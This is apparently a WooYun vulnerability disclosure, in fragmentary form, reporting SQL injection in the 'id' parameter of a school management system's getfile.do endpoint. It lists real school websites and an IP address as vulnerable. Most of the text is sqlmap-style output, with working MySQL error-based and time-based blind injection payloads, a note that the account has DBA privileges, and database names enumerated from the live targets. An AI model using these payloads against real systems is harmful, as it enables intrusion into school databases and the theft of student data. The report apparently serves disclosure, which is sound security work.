WooYun.org

http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml

url+/jw/student/getfile.do?id=

http://www.zgc3x.com/jw/student/getfile.do?id=

available databases [9]:
[*] data_prd_20131022
[*] data_prd_v3
[*] data_prd_v3_pk_bak0730
[*] information_schema
[*] mailpublic
[*] mysql
[*] openfire
[*] performance_schema
[*] test

举例2：北京中芯学校
http://1.202.236.46/jw/student/getfile.do?id=

Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=-3994' AND (SELECT 1370 FROM(SELECT COUNT(*),CONCAT(0x717a697571,(SELECT (CASE WHEN (1370=1370) THEN 1 ELSE 0 END)),0x7161616a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Byzi'='Byzi
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=-3994' AND SLEEP(5) AND 'uoFu'='uoFu
DBA权限
数据库
available databases [7]:
[*] data_prd
[*] data_prd_bak_20130717
[*] data_prd_bak_20140212
[*] information_schema
[*] mysql
[*] openfire
[*] performance_schema

例子3：http://www.zgc3x.com/jw/student/getfile.do?id=
北师大三附中